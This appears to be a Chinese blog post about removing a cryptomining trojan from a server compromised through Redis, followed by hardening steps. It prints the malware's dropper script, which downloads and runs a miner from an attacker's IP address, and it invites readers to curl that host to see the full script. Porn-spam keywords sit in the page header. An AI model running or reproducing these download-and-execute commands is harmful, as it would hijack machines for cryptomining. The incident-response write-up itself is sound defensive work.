亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

服務器被植入挖礦木馬cpu飆升200%的解決過程是什么

發布時間:2021-12-06 17:17:21 來源:億速云 閱讀:172 作者:柒染 欄目:云計算

這篇文章將為大家詳細講解有關服務器被植入挖礦木馬cpu飆升200%的解決過程是什么,文章內容質量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關知識有一定的了解。

背景

線上服務器用的是某訊云的,歡快的完美運行著Tomcat,MySQLMongoDB,ActiveMQ等程序。突然一則噩耗從前線傳來:網站不能訪問了。

此項目是我負責,我以150+的手速立即打開了服務器,看到Tomcat掛了,然后順其自然的重啟,啟動過程中直接被killed,再試試數據庫,同樣沒成功,多次嘗試甚至重啟機器無果。機制的我打了個top,出現以下內容:

服務器被植入挖礦木馬cpu飆升200%的解決過程是什么  

這是誰運行的程序?不管三七二十一先殺掉再說,因為它就是Tomcat等程序啟動不了的元兇。然而并沒有什么卵用,過一會再看那個東西又跑出來占cpu。懷疑是個定時任務:

服務器被植入挖礦木馬cpu飆升200%的解決過程是什么  

什么鬼,是個圖片?立即訪問了一下:

服務器被植入挖礦木馬cpu飆升200%的解決過程是什么  

好尷尬,但是心思細膩的我早知道沒這么簡單,肯定只是偽裝,crul過去是下面的腳本,過程就是在挖礦:

#!/bin/sh
pkill -9 142.4.124.164
pkill -9 192.99.56.117
pkill -9 jva
pkill -f ./atd
pkill -f /tmp/wa/httpd.conf
pkill -f 108.61.186.224
pkill -f 128.199.86.57
pkill -f 67.231.243.10
pkill -f 142.4.124.164
pkill -f 192.99.56.117
pkill -f 45.76.102.45
pkill -f AnXqV.yam
pkill -f BI5zj
pkill -f Carbon
pkill -f Duck.sh
pkill -f Guard.sh
...中間省略
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &
fi
ps -fe|grep -w suppoie |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
curl -o /var/tmp/config.json http://192.99.142.235:8220/1.json
curl -o /var/tmp/suppoie http://192.99.142.235:8220/rig1
chmod 777 /var/tmp/suppoie
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &
sleep 3
fi
if [ $? -eq 0 ]
then
pwd
else
curl -o /var/tmp/config.json http://192.99.142.235:8220/1.json
curl -o /var/tmp/suppoie http://192.99.142.235:8220/rig2
chmod 777 /var/tmp/suppoie
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &
fi
echo "runing....."
 

有興趣的同學想查看以上完整源代碼,命令行運行下面指令(不分操作系統,方便安全無污染):

curl 192.99.142.235:8220/logo3.jpg
 

既然知道它是個定時任務,那就先取消了它,并且看看它是誰在運行:

服務器被植入挖礦木馬cpu飆升200%的解決過程是什么

殺掉,找到存放目錄:

服務器被植入挖礦木馬cpu飆升200%的解決過程是什么

進入臨時目錄:

服務器被植入挖礦木馬cpu飆升200%的解決過程是什么  

被我發現配置文件了,先來看看內容:

服務器被植入挖礦木馬cpu飆升200%的解決過程是什么  

虎軀一震,發現了不少信息啊,user是他的server的登錄用戶,下面是密碼,只可惜加密過,應該找不到對方。算了,大度的我先不和你計較。干掉這兩個文件后再查看top:

服務器被植入挖礦木馬cpu飆升200%的解決過程是什么  
 

解決辦法

找到寄生的目錄,一般都會在tmp里,我這個是在/var/tmp/。首先把crontab干掉,殺掉進程,再刪除產生的文件。啟動Tomcat等程序,大功告成!

等等,這遠遠不夠,考慮到能被拿去挖礦的前提下你的服務器都已經被黑客入侵了,修復漏洞才對,不然你殺掉進程刪掉文件后,黑客后門進來history一敲,都知道你做了啥修復手段。

所以上面辦法治標不治本,我后續做了以下工作:

  • 把所有軟件升級到新版本,修復 redis 的后門,配置bind選項, 限定可以連接Redis服務器的IP,并修改redis的默認端口6379。配置AUTH, 設置密碼,密碼會以明文方式保存在redis配置文件中。

  • 修改所有軟件默認端口號

  • 打開ssh/authorized_keys,刪除不認識的密鑰

  • 刪除用戶列表中陌生的帳號

  • 封了他的ip

  • SSH使用密鑰登錄并禁止口令登錄(這個一般是加運維一個人的秘鑰)

木馬原因,是redis漏洞導致:

最好的方式:將主機鏡像,找出病毒木馬,分析入侵原因。檢查業務程序,重裝系統,修復漏洞,再重新部署系統。

關于服務器被植入挖礦木馬cpu飆升200%的解決過程是什么就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

昌平区| 习水县| 屏山县| 抚松县| 台安县| 游戏| 镇雄县| 仪陇县| 通许县| 绥滨县| 加查县| 富阳市| 庆阳市| 绥芬河市| 福贡县| 贡山| 永安市| 惠州市| 德令哈市| 定远县| 晋江市| 商丘市| 楚雄市| 易门县| 博客| 巧家县| 香格里拉县| 泾川县| 嵩明县| 德保县| 威远县| 新干县| 油尖旺区| 阿拉尔市| 柳江县| 宁化县| 出国| 宁乡县| 永丰县| 五家渠市| 古丈县|